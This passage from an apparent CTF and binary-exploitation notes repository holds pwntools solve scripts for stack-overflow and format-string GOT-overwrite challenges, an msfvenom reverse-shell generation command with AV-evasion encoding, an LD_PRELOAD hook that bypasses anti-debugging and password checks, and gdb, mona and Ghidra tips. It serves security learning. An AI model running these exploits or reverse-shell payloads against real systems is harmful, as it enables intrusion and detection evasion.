 90 | PROGRAM = "./vuln"
 91 | p = process(PROGRAM)
 92 | 
 93 | # Setup the payload
 94 | elf = ELF(PROGRAM)
 95 | win_func_addr = p32(elf.symbols["win"])
 96 | arg1 = p32(0xDEADBEEF)
 97 | arg2 = p32(0xDEADC0DE)
 98 | padding = ("A" * (100 + 12)).encode() # BUFSIZE + stuff we do not care about
 99 | padding2 = ("A" * 4).encode() # Override the return address
100 | 
101 | payload = padding + win_func_addr + padding2 + arg1 + arg2
102 | 
103 | # Sending the payload
104 | p.sendlineafter("your string: \n", payload)
105 | p.interactive()
106 | ```
107 | 
108 | Execution :
109 | 
110 | ```shell
111 | $ echo "ggflag" > flag.txt
112 | $ python3 solve.py 
113 | [+] Starting local process './vuln': pid 13568
114 | [*] '/home/xxx/pico/vuln'
115 |     Arch:     i386-32-little
116 |     RELRO:    Partial RELRO
117 |     Stack:    No canary found
118 |     NX:       NX enabled
119 |     PIE:      No PIE (0x8048000)
120 | [*] Switching to interactive mode
121 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA˅\x04AAAAﾭ\xde\xde\xc0\xad\xde
122 | ggflag
123 | [*] Got EOF while reading in interactive
124 | $ 
125 | ```
126 | 


--------------------------------------------------------------------------------
/docs/pwn/format-string/01-introduction-format-string.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction - Format string
 3 | description: Introduction to binary exploitation with format string.
 4 | ---
 5 | 
 6 | # Introduction - Format string
 7 | 
 8 | - `%d` or `%i`: Argument will be used as decimal integer (signed or unsigned)
 9 | - `%o`: An octal unsigned integer
10 | - `%u`: An unsigned decimal integer - this means negative numbers will wrap around
11 | - `%x` or `%X`: An unsigned hexadecimal integer
12 | - `%f`,  `%g`  or  `%G`: A floating-point number. %f defaults to 6 places after the decimal point (which is locale-dependent - e.g. in de_DE it will be a ,). %g and %G will trim trailing zeroes and switch to scientific notation (like %e) if the numbers get small or large enough.
13 | - `%e` or `%E`: A floating-point number in scientific (XXXeYY) notation
14 | - `%s`: A string
15 | - `%b`: As a string, interpreting backslash escapes, except that octal escapes are of the form 0 or 0ooo.
16 | - `%n`: Write the number of characters printed thus far to an `int` variable


--------------------------------------------------------------------------------
/docs/pwn/format-string/03-overwrite-address.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Overwrite GOT function address
  3 | description: Overwriting a function address using a format string attack.
  4 | ---
  5 | 
  6 | # Format string - Overwrite GOT function address
  7 | 
  8 | ## Summary
  9 | 
 10 | Two ways to write an address using `%n` :
 11 | 
 12 | 1. Print millions of charcaters.
 13 | 2. Overwrite lower and higher 2 bytes seperatly (efficient way).
 14 | 
 15 | ## Challenge
 16 | 
 17 | ### Statement
 18 | 
 19 | !!! note ""
 20 |     Challenge : `seguin` from FCSC 2021.
 21 | 
 22 | ### Source code
 23 | 
 24 | ```c linenums="1"
 25 | 
 26 | void main() {
 27 |   char local_30 [32];
 28 | 
 29 |   puts("************************************");
 30 |   puts("** Service d'adoption des bovidés **");
 31 |   puts("************************************");
 32 |   printf("Merci d\' indiquer le nom de l\'animal que vous etes venus chercher :\n>>> ");
 33 |   fflush(stdout);
 34 | 
 35 |   fgets(local_30, 32, stdin);
 36 |   printf("Vouz avez demandé ");
 37 |   printf(local_30);
 38 | 
 39 |   puts("Nous vous tiendrons au courant");
 40 | }
 41 | 
 42 | 
 43 | void chevre() {
 44 |   system("/bin/sh");
 45 |   return;
 46 | }
 47 | ```
 48 | 
 49 | ## Answer
 50 | 
 51 | The last `printf` function of `main()` is vulnerable to format string attack. Let's use `%n` to replace the address of `exit` to the address of `chevre`.
 52 | 
 53 | Source code (solve.py) :
 54 | 
 55 | ```python
 56 | #!/usr/bin/env python3
 57 | from pwn import process, ELF, p32, log, context, fmtstr_payload
 58 | 
 59 | 
 60 | def send_line(proc, line):
 61 |     """ Send line to the process """
 62 |     if isinstance(line, str):
 63 |         line = line.encode()
 64 | 
 65 |     proc.sendlineafter(b">>> ", line)
 66 | 
 67 |     return proc.recvline().split(b"Vouz avez demand\xc3\xa9 ")[1].strip()
 68 | 
 69 | 
 70 | def find_offset():
 71 |     """ Find the correct offset in the stack """
 72 |     i = 0
 73 |     while True:
 74 |         with context.local(log_level="error"):
 75 |             proc = process(PROGRAM)
 76 |             data = send_line(proc, f"ABCD%{i}$x")
 77 |             proc.close()
 78 | 
 79 |         if b"ABCD44434241" == data:
 80 |             break
 81 | 
 82 |         i += 1
 83 |     return i
 84 | 
 85 | 
 86 | # Variables 
 87 | PROGRAM = "./seguin"
 88 | elf = ELF(PROGRAM)
 89 | chevre = elf.symbols["chevre"]
 90 | exi = elf.got["exit"]
 91 | 
 92 | offset = find_offset()
 93 | log.info(f"Offset : n°{offset}")
 94 | 
 95 | # Setup payload
 96 | ## First way
 97 | """
 98 | payload = p32(exi) # Address to write
 99 | payload += f"%1${chevre}x".encode() # Print 'n' char with 'n' = the address of 'chevre' (int)
100 | payload += f"%{offset}$n".encode() # Write on puts (offset in the stack) the number of printed char
101 | """
102 | 
103 | ## Second way
104 | # 0x80491b2 <chevre>:     0x53e58955
105 | payload = p32(exi)
106 | payload += p32(exi+2)
107 | 
108 | # 0000 91b2
109 | payload += f"%{0x91b2-len(payload)}x".encode()
110 | payload += f"%{offset}$n".encode()
111 | 
112 | # 0001 0804
113 | payload += f"%{0x10804-0x91b2}x".encode()
114 | payload += f"%{offset+1}$n".encode()
115 | 
116 | proc = process(PROGRAM)
117 | proc.sendlineafter(b">>> ", payload)
118 | proc.interactive()
119 | ```
120 | 
121 | Execution :
122 | 
123 | ```
124 | $ python3 solve.py
125 | [*] '/home/.../Seguin/seguin'
126 |     Arch:     i386-32-little
127 |     RELRO:    Partial RELRO
128 |     Stack:    No canary found
129 |     NX:       NX enabled
130 |     PIE:      No PIE (0x8048000)
131 | [*] Offset : n°4
132 | [+] Starting local process './seguin': pid 5774
133 | [*] Switching to interactive mode
134 | Vouz avez demandé `\x90\x04b\x90\x04
135 | [...]
136 |         f7f33540
137 | Nous vous tiendrons au courant
138 | $ id
139 | uid=1000(xanhacks) gid=1000(xanhacks) groups=1000(xanhacks),995(audio),998(wheel)
140 | ```


--------------------------------------------------------------------------------
/docs/pwn/gdb.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: gdb cheatsheet
 3 | description: gdb cheatsheet with examples.
 4 | ---
 5 | 
 6 | # gdb cheatsheet
 7 | 
 8 | **gdb** (The GNU Debugger) allows you to debug your program, it can be very usefull to check if your exploit is working as expected.
 9 | 
10 | ## gdb add-ons
11 | 
12 | I recommend you to use one of the following gdb plugins, it will simplify your debugging process by adding new functions and readability to **gdb**.
13 | 
14 | - [gef](https://github.com/hugsy/gef)
15 | - [pwndbg](https://github.com/pwndbg/pwndbg)
16 | - [peda](https://github.com/longld/peda)
17 | 
18 | ## Cheatsheets
19 | 
20 | ### Stdin
21 | 
22 | ```bash
23 | gef➤  r <<< $(python2 -c "print '\xb2\x91\x04\x08'")
24 | 
25 | or
26 | 
27 | gef➤  r < payload.txt
28 | ```
29 | 
30 | ### Breakpoints
31 | 
32 | ```bash
33 | gef➤  b *main
34 | Breakpoint 1 at 0x1139
35 | gef➤  b *main+2
36 | Breakpoint 2 at 0x113b
37 | gef➤  info b
38 | Num     Type           Disp Enb Address            What
39 | 1       breakpoint     keep y   0x0000000000001139 <main>
40 | 2       breakpoint     keep y   0x000000000000113b <main+2>
41 | gef➤  disable 2
42 | gef➤  info b
43 | Num     Type           Disp Enb Address            What
44 | 1       breakpoint     keep y   0x0000000000001139 <main>
45 | 2       breakpoint     keep n   0x000000000000113b <main+2>
46 | gef➤  del 1
47 | gef➤  info b
48 | Num     Type           Disp Enb Address            What
49 | 2       breakpoint     keep n   0x000000000000113b <main+2>
50 | ```
51 | 
52 | ### Navigation
53 | 
54 | ```bash
55 | gef➤ si # Step one instruction.
56 | gef➤ ni # Step one instruction, but if it is a function call, proceed until the function returns.
57 | gef➤ c # or 'continue', run the programm normally until we hit a breakpoint.
58 | ```
59 | 
60 | ### Printing
61 | 
62 | `x[/Nuf] expr` : examine memory.
63 | 
64 | `N` : count of how many units to display.
65 | 
66 | `u` : unit size; one of : `b` individual bytes, `h` halfwords (two bytes), `w` words (four bytes), `g` giant words (eight bytes)
67 | 
68 | `f` : printing format, `s` null terminated string, `i` machine instructions.
69 | 
70 | ```bash
71 | gef➤  x 0x55555555513d
72 | 0x55555555513d <main+4>:        0xc0058d48
73 | gef➤  x/3 0x55555555513d
74 | 0x55555555513d <main+4>:        0xc0058d48      0x4800000e      0xe4e8c789
75 | gef➤  x/3b 0x55555555513d
76 | 0x55555555513d <main+4>:        0x48    0x8d    0x05
77 | ```
78 | 
79 | 
80 | 
81 | ### Heap
82 | 
83 | ```bash
84 | gef➤  heap
85 | [!] Syntax
86 | heap (chunk|chunks|bins|arenas)
87 | gef➤  heap chunks
88 | Chunk(addr=0x603010, size=0x290, flags=PREV_INUSE)
89 |     [0x0000000000603010     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................]
90 | Chunk(addr=0x6032a0, size=0x410, flags=PREV_INUSE)
91 |     [0x00000000006032a0     74 6f 74 6f 0a 0a 00 00 00 00 00 00 00 00 00 00    toto............]
92 | Chunk(addr=0x6036b0, size=0x30, flags=PREV_INUSE)
93 |     [0x00000000006036b0     e0 36 60 00 00 00 00 00 00 00 00 00 00 00 00 00    .6`.............]
94 | Chunk(addr=0x6036e0, size=0x20, flags=PREV_INUSE)
95 |     [0x00000000006036e0     74 6f 74 6f 00 00 00 00 00 00 00 00 00 00 00 00    toto............]
96 | - Chunk(addr=0x603700, size=0x20910, flags=PREV_INUSE)  ←  top chunk
97 | ```


--------------------------------------------------------------------------------
/docs/pwn/heap/01-introduction-heap.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction - Heap
 3 | description: Introduction to binary exploitation on the heap.
 4 | ---
 5 | 
 6 | # Introduction - Heap
 7 | 
 8 | ## C Functions
 9 | 
10 | - **void\* malloc(size_t size)** allocates the requested memory and returns a pointer to it (or NULL if the request fails).
11 | 	- **size** − This is the size of the memory block, in bytes.
12 | - **void\* calloc(size_t nitems, size_t size)** allocates the requested memory and returns a pointer to it (or NULL if the request fails).
13 | 	- **nitems** − This is the number of elements to be allocated.
14 | 	- **size** − This is the size of elements.
15 | - **void free(void \*ptr)** deallocates the memory previously allocated by a call to calloc, malloc, or realloc.
16 | 	- **ptr** − This is the pointer to a memory block previously allocated with malloc, calloc or realloc to be deallocated. If a null pointer is passed as argument, no action occurs.
17 | - **void\* realloc(void \*ptr, size_t size)** attempts to resize the memory block pointed to by **ptr** that was previously allocated with a call to `malloc` or `calloc`.
18 | 	- **ptr** − This is the pointer to a memory block previously allocated with malloc, calloc or realloc to be reallocated. If this is NULL, a new block is allocated and a pointer to it is returned by the function.
19 | 	- **size** − This is the new size for the memory block, in bytes. If it is 0 and ptr points to an existing block of memory, the memory block pointed by ptr is deallocated and a NULL pointer is returned.
20 | 
21 | > Source [tutorialspoint](https://www.tutorialspoint.com/c_standard_library/c_function_malloc.htm).
22 | 
23 | !!! warning
24 | 	The difference in `malloc()` and `calloc()` is that `malloc` does not set the memory to zero where as calloc sets allocated memory to zero.
25 | 
26 | !!! warning
27 |     The `free()` function does not delete the contents of the allocated chunk.
28 | 
29 | 


--------------------------------------------------------------------------------
/docs/pwn/mona.md:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ```
 4 | bp 0x62501203
 5 | !mona config -set workingfolder c:\mona\%p
 6 | 
 7 | 
 8 | !mona bytearray -b "\x00"
 9 | !mona compare -f C:\mona\oscp\bytearray.txt -a <address>
10 | 
11 | !mona jmp -r esp -cpb "\x00\xa9\xcd\xd4"
12 | ```


--------------------------------------------------------------------------------
/docs/pwn/shellcode/01-introduction.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction
 3 | description: Introduction to shellcode
 4 | ---
 5 | 
 6 | # Introduction to shellcode
 7 | 
 8 | A **shellcode** is just a small piece of code that spawns a shell (ex: `/bin/sh`).
 9 | 
10 | ## Usage
11 | 
12 | In binary exploitation, if you put your shellcode inside an executable memory space, then jump to it. You can spawn a shell on the victim machine.
13 | 
14 | ## Types
15 | 
16 | - **Local** : Spawn a shell on the local machine.
17 | - **Remote** : Spawn a shell over TCP/UDP (reverse or bind shell).
18 | - **Staged** : 2 parts (dropper + actual shellcode)
19 | - **Egg-hunt** : Place an *egg* (unique value) just before your shellcode. Then, look for this *egg* inside the process's address space to find your shellcode address (Very usefull when you can't determine where your shellcode will be in memory).
20 | - **Omelette** : Similar to _egg-hunt_ shellcode, but looks for multiple blocks (_eggs_) and recombines them into one larger block (the _omelette_) that is subsequently executed.
21 | 
22 | ## Encoding
23 | 
24 | You can use shellcode encoding for multiple purposes :
25 | 
26 | - bypass badchars (null-free, alphanumeric, ...)
27 | - AV evasion
28 | - reduce code size
29 | - ...
30 | 
31 | ## References
32 | 
33 | - [Wikipedia - Shellcode](https://en.wikipedia.org/wiki/Shellcode)
34 | - [AnubisSec - Egghunter Shellcode](https://anubissec.github.io/Egghunter-Shellcode/)
35 | 
36 | 


--------------------------------------------------------------------------------
/docs/pwn/shellcode/05-writing.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Shellcoding
  3 | description: Writing shellcode
  4 | ---
  5 | 
  6 | # Shellcoding
  7 | 
  8 | ## Avoiding bad chars
  9 | 
 10 | You can use `metasm_shell` to detect bad chars in your shellcode :
 11 | 
 12 | ```bash
 13 | $ /opt/metasploit/tools/exploit/metasm_shell.rb
 14 | type "exit" or "quit" to quit
 15 | use ";" or "\n" for newline
 16 | type "file <file>" to parse a GAS assembler source file
 17 | 
 18 | metasm >
 19 | ```
 20 | 
 21 | ### Basic examples
 22 | 
 23 | Substitute `1000` from a register :
 24 | 
 25 | ```bash
 26 | metasm > sub esp,1000
 27 | "\x81\xec\xe8\x03\x00\x00"
 28 | 
 29 | metasm > add esp,-1000
 30 | "\x81\xc4\x18\xfc\xff\xff"
 31 | ```
 32 | 
 33 | Set a register to `0` :
 34 | 
 35 | ```bash
 36 | metasm > mov eax,0
 37 | "\xb8\x00\x00\x00\x00"
 38 | 
 39 | metasm > xor eax,eax
 40 | "\x31\xc0"
 41 | ```
 42 | 
 43 | Set a register to `1` :
 44 | 
 45 | ```bash
 46 | metasm > mov eax,1
 47 | "\xb8\x01\x00\x00\x00"
 48 | 
 49 | metasm > xor eax,eax
 50 | "\x31\xc0"
 51 | metasm > inc eax
 52 | "\x40"
 53 | ```
 54 | 
 55 | ## Msfvenom
 56 | 
 57 | Generates shellcode with `msfvenom`.
 58 | 
 59 | - List encoders : `msfvenom -l encoders`
 60 | - List payloads : `msfvenom -l payloads`
 61 | - List formats : `msfvenom -l formats`
 62 | 
 63 | ### Basic example
 64 | 
 65 | ```bash
 66 | $ msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.0.5 LPORT=4444 EXITFUNC=thread -f python -b '\x00\x0a\x0d' -v shellcode
 67 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
 68 | Found 11 compatible encoders
 69 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
 70 | x86/shikata_ga_nai succeeded with size 351 (iteration=0)
 71 | x86/shikata_ga_nai chosen with final size 351
 72 | Payload size: 351 bytes
 73 | Final size of python file: 1965 bytes
 74 | shellcode =  b""
 75 | shellcode += b"\xdd\xc6\xd9\x74\x24\xf4\xbd\x25\xb1\xf0\x63"
 76 | shellcode += b"\x5a\x31\xc9\xb1\x52\x31\x6a\x17\x03\x6a\x17"
 77 | shellcode += b"\x83\xcf\x4d\x12\x96\xf3\x46\x51\x59\x0b\x97"
 78 | shellcode += b"\x36\xd3\xee\xa6\x76\x87\x7b\x98\x46\xc3\x29"
 79 | [...]
 80 | ```
 81 | 
 82 | - `-a` : Architecture (ex: `x86`).
 83 | - `-p` : Payload (ex: `windows/shell_reverse_tcp`, `linux/x86/meterpreter/reverse_tcp`).
 84 | - `-f` : Output format (ex: `python`, `c`, `raw`).
 85 | - `-b` : Badchars (ex: `\x00` null byte, `\x0a` line feed, `\x0d` carriage return).
 86 | - `-v` : Variable name (ex: `buf`, `shellcode`)
 87 | - `EXITFUNC` : Use `thread` to avoid crashing the target application.
 88 | 
 89 | ### AV Evasion
 90 | 
 91 | - `-e <encoder>` : Specify an encoder (ex: `86/shikata_ga_nai`).
 92 | - `-i <int>` : Number of encoding iterations.
 93 | 
 94 | The downside of adding more iterations is that the shellcode size increases every iteration.
 95 | 
 96 | ### Limits size
 97 | 
 98 | - `-s <int>` : Maximum size of the shellcode (in bytes)
 99 | 
100 | ## References
101 | 
102 | - [Github - voydstack/shellcoding](https://github.com/voydstack/shellcoding)


--------------------------------------------------------------------------------
/docs/pwn/shellcode/10-exploitation.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Exploitation
 3 | description: Writing shellcode
 4 | ---
 5 | 
 6 | ## Generating badchars
 7 | 
 8 | ```bash
 9 | $ python3 -c "[print('\\\x{:02x}'.format(i), end='') for i in range(0xFF)]"
10 | \x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe
11 | ```


--------------------------------------------------------------------------------
/docs/reverse/assembly/x86-assembly.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Introduction to x86 assembly
 3 | description: Introduction to x86 assembly with nasm.
 4 | ---
 5 | 
 6 | # Introduction to x86 assembly
 7 | 
 8 | ## exit syscall
 9 | 
10 | This program call the syscall n°1 (value of the register `eax`) which represents the syscall `exit` ([syscalls list](https://syscalls.w3challs.com/?arch=x86)). The register `ebx` holds the argument of the function exit, here the program will do `exit(0xc)`.
11 | 
12 | code.asm
13 | 
14 | ```asm
15 | section     .text
16 | global      _start
17 | _start:
18 |     mov     ebx, 0xc
19 |     mov     eax, 1
20 |     int     0x80
21 | ```
22 | 
23 | ### Assemble and link
24 | 
25 | ```bash
26 | $ nasm -f elf64 code.asm	# assemble the program
27 | $ ld -s -o code code.o		# link the object file nasm produced into an executable
28 | $ ./code
29 | $ echo $?
30 | 12
31 | ```
32 | 
33 | If we look at the exit code of the program, we can see it's `12` (`0xc`).


--------------------------------------------------------------------------------
/docs/reverse/autoit.md:
--------------------------------------------------------------------------------
 1 | # AutoIt
 2 | 
 3 | ## Definition
 4 | 
 5 | AutoIt is a free, open-source programming language designed for automating the Windows graphical user interface (GUI). It was developed in 1999 as a way for non-programmers to create simple automation scripts for tasks such as clicking buttons, filling out forms, and performing other repetitive tasks. It has been used by some malware developers to create malicious scripts and executables because it is relatively easy to learn and use.
 6 | 
 7 | AutoIt uses a BASIC-like syntax and includes a number of built-in functions for interacting with the Windows GUI, such as sending mouse clicks and keystrokes, controlling windows and processes, and reading and writing to the clipboard. AutoIt scripts can be compiled into standalone executables, making it easy to distribute automation scripts to other users.
 8 | 
 9 | You can install `AutoIt` on [www.autoitscript.com](https://www.autoitscript.com/site/autoit/downloads/).
10 | 
11 | ## Compiler
12 | 
13 | You can use the `Aut2exe.exe` to compile AutoIt scripts (`.au3`).
14 | 
15 | ```
16 | Aut2exe.exe /in <infile.au3> [/out <outfile.exe>] [/icon <iconfile.ico>] [/comp 0-4] [/nopack] [/x64] [/bin <binfile.bin>]
17 | ```
18 | 
19 | Example of usage :
20 | 
21 | ```
22 | "C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe" /in debug.au3 /out debug.exe /console
23 | ```
24 | 
25 | ## Decompiler
26 | 
27 | You can use the [Exe2Aut](https://github.com/JacobPimental/exe2aut) decompiler.
28 | 
29 | Simply drag & drop your AutoIt executable on this application to obtain the `.au3` source code.
30 | 
31 | ## Language
32 | 
33 | Here is some useful AutoIt functions :
34 | 
35 | - [ConsoleWrite ( "data" )]() : Writes data to the STDOUT stream (only for console application).
36 | - [MsgBox ( flag, "title", "text" [, timeout = 0 [, hwnd]] )](https://www.autoitscript.com/autoit3/docs/functions/MsgBox.htm) : Displays a simple message box with optional timeout.
37 | - [StringMid ( "string", start [, count = -1] )](https://www.autoitscript.com/autoit3/docs/functions/StringMid.htm) : Extracts a number of characters from a string.
38 | - [DllStructCreate ( Struct [, Pointer] )](https://www.autoitscript.com/autoit3/docs/functions/DllStructCreate.htm) : Creates a C/C++ style structure to be used in DllCall.
39 | - [DllStructSetData ( Struct, Element, value [, index] )](https://www.autoitscript.com/autoit3/docs/functions/DllStructSetData.htm) : Sets the data of an element in the struct.
40 | - [DllCall ( "dll", "return type", "function" [, type1, param1 [, type n, param n]] )](https://www.autoitscript.com/autoit3/docs/functions/DllCall.htm) : Dynamically calls a function in a DLL.
41 | 
42 | Most used AutoIt functions according to ChatGPT :
43 | 
44 | - `ControlClick`: Simulates a mouse click on a control.
45 | - `ControlSend`: Sends keystrokes to a control.
46 | - `ControlSetText`: Sets the text of a control.
47 | - `WinActivate`: Activates a window.
48 | - `WinWait`: Waits for a window to appear.
49 | - `ProcessClose`: Closes a process.
50 | - `Run`: Launches a program or opens a file.
51 | - `Send`: Sends keystrokes to the active window.
52 | - `Sleep`: Pauses the script for a specified number of milliseconds.
53 | - `FileRead`: Reads a file and returns its contents as a string.
54 | - `FileWrite`: Writes a string to a file.
55 | 
56 | Make a comment :
57 | 
58 | ```autoit
59 | ; This is a comment !
60 | ```


--------------------------------------------------------------------------------
/docs/reverse/ghidra.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Ghidra
 3 | description: Ghidra tool cheatsheet
 4 | ---
 5 | 
 6 | # Ghidra
 7 | 
 8 | ## Tips
 9 | 
10 | - Show symbols : `Window` -> `Symbol References`
11 | - Replace constant with variable name : `Rigth click` -> `Set Equate`
12 | - Show functions graph : `Window` -> `Function Call Graph`
13 | 
14 | ## Settings
15 | 
16 | - Change base address : `Window` -> `Memory map` -> `Set Image Base (house icon)`
17 | - Dark mode (invert colors) : `Edit` -> `Tool Options...` -> `Tool` -> Enable `Use Inverted Colors`
18 | - Highlight registers on click : `Edit` -> `Tool Options...` -> `Listing Fields` (`Cursor Text Highlight`) -> Set `Mouse Button To Activate` to `LEFT`
19 | 
20 | ## References
21 | 
22 | - [blogs.blackberry.com - 
23 | Code Analysis With Ghidra: An Introduction](https://blogs.blackberry.com/en/2019/07/an-introduction-to-code-analysis-with-ghidra)


--------------------------------------------------------------------------------
/docs/reverse/hook.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | title: Hook functions
 3 | description: How to hook functions to improve debugging.
 4 | ---
 5 | 
 6 | # Hook functions
 7 | 
 8 | ## ltrace / strace
 9 | 
10 | - `ltrace` - A library call tracer
11 | - `strace` - Trace system calls and signals
12 | 
13 | ## Using LD_PRELOAD
14 | 
15 | Hook two functions :
16 | 
17 | - `ptrace` : Always return 0 (no debugger present).
18 | - `strcmp` : String are always equals.
19 | 
20 | ```c
21 | #include <stdio.h>
22 | 
23 | 
24 | long ptrace(int request, unsigned int pid, void *addr, void *data) {
25 |        printf("\n[*] call ptrace(%d, %u, %x, %x);\n", request, pid, addr, data);
26 |        return 0;
27 | }
28 | 
29 | int strcmp(const char *s1, const char *s2) {
30 |     printf("\n[*] call strcmp(%s, %s);\n", s1, s2);
31 |     return 0;
32 | }
33 | ```
34 | 
35 | Compile and run it :
36 | 
37 | ```
38 | $ gcc preload.c -m32 -shared -fPIC -o preload.so
39 | $ LD_PRELOAD=./preload.so ./binary
40 | [*] call ptrace(0, 0, 1, 0);
41 | Enter a password : toto
42 | 
43 | [*] call strcmp(toto, Password123);
44 | 
45 | Authentication successful !
46 | ```


--------------------------------------------------------------------------------
/docs/reverse/index.md:
--------------------------------------------------------------------------------
 1 | # Reverse Engineering
 2 | 
 3 | Reverse engineering is the process of analyzing a product, system, or piece of software in order to understand how it works.
 4 | 
 5 | ## Disable ASLR
 6 | 
 7 | ### Linux
 8 | 
 9 | Disable ASLR on the whole system :
10 | 
11 | ```bash
12 | # Turn OFF
13 | echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
14 | # Turn ON
15 | echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
16 | ```
17 | 
18 | ### Windows
19 | 
20 | The value is stored on [IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format#dll-characteristics) at offset 0x40.
21 | 
22 | Disable ASLR on a binary (2 options) :
23 | 
24 | 1. Open the binary with [PEStudio](https://pestudio.en.lo4d.com/windows), go to `optional-header` and set `address-space-layout-randomization (ASLR)` to `false`.
25 | 2. Open the binary with [CFFExplorer](https://ntcore.com/?tag=cff-explorer), go to `Optional Header`, click on `DllCharateristics` and uncheck `DLL can move`.
26 | 


--------------------------------------------------------------------------------
/docs/reverse/stripped-binary.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | title: Stripped binary
  3 | description: Debugging stripped binary.
  4 | ---
  5 | 
  6 | # Stripped binary
  7 | 
  8 | A **stripped binary** is a binary which does not conatin any debugging symbols.
  9 | 
 10 | ## Debbugging with gdb
 11 | 
 12 | ```bash
 13 | $ file Basic-ELF-x64.bin
 14 | Basic-ELF-x64.bin: ELF 64-bit LSB pie executable, x86-64, [...], stripped
 15 | 
 16 | $ gdb ./Basic-ELF-x64.bin
 17 | GNU gdb (GDB) 11.1
 18 | Reading symbols from ./Basic-ELF-x64.bin...
 19 | (No debugging symbols found in ./Basic-ELF-x64.bin)
 20 | 
 21 | gef➤  info file
 22 | Symbols from ".../Basic-ELF-x64.bin".
 23 | Local exec file: `.../Basic-ELF-x64.bin', file type elf64-x86-64.
 24 |         Entry point: 0x10e0 # <--- ENTRYPOINT
 25 |         0x0000000000000318 - 0x0000000000000334 is .interp
 26 |         0x0000000000000338 - 0x0000000000000358 is .note.gnu.property
 27 | ```
 28 | 
 29 | Using entrypoint does not always work :
 30 | 
 31 | ```bash
 32 | gef➤  b *0x10e0
 33 | Breakpoint 1 at 0x10e0
 34 | gef➤  r
 35 | Starting program: .../Basic-ELF-x64.bin
 36 | Warning:
 37 | Cannot insert breakpoint 1.
 38 | Cannot access memory at address 0x10e0
 39 | gef➤  del 1
 40 | ```
 41 | 
 42 | However, you can look for entrypoint at runtime :
 43 | 
 44 | ```bash
 45 | gef➤  b *0x0
 46 | Breakpoint 2 at 0x0
 47 | Warning:
 48 | Cannot insert breakpoint 2.
 49 | Cannot access memory at address 0x0
 50 | 
 51 | gef➤  r
 52 | Starting program: .../Basic-ELF-x64.bin
 53 | Warning:
 54 | Cannot insert breakpoint 2.
 55 | Cannot access memory at address 0x0
 56 | 
 57 | gef➤  disass
 58 | Dump of assembler code for function _start:
 59 | => 0x00007ffff7fce090 <+0>:     mov    rdi,rsp
 60 |    0x00007ffff7fce093 <+3>:     call   0x7ffff7fcee20 <_dl_start>
 61 | End of assembler dump.
 62 | gef➤  del 2
 63 | gef➤  b *0x00007ffff7fce090
 64 | Breakpoint 3 at 0x7ffff7fce090
 65 | gef➤  x/10i $rip
 66 | => 0x7ffff7fce090 <_start>:     mov    rdi,rsp
 67 |    0x7ffff7fce093 <_start+3>:   call   0x7ffff7fcee20 <_dl_start>
 68 |    0x7ffff7fce098 <_dl_start_user>:     mov    r12,rax
 69 |    0x7ffff7fce09b <_dl_start_user+3>:   mov    eax,DWORD PTR [rip+0x2dc17]        # 0x7ffff7ffbcb8 <_dl_skip_args>
 70 |    0x7ffff7fce0a1 <_dl_start_user+9>:   pop    rdx
 71 |    0x7ffff7fce0a2 <_dl_start_user+10>:  lea    rsp,[rsp+rax*8]
 72 |    0x7ffff7fce0a6 <_dl_start_user+14>:  sub    edx,eax
 73 |    0x7ffff7fce0a8 <_dl_start_user+16>:  push   rdx
 74 |    0x7ffff7fce0a9 <_dl_start_user+17>:  mov    rsi,rdx
 75 |    0x7ffff7fce0ac <_dl_start_user+20>:  mov    r13,rsp
 76 | ```
 77 | 
